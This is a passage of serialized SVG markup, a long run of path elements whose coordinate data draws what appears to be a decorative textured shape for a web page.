d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path 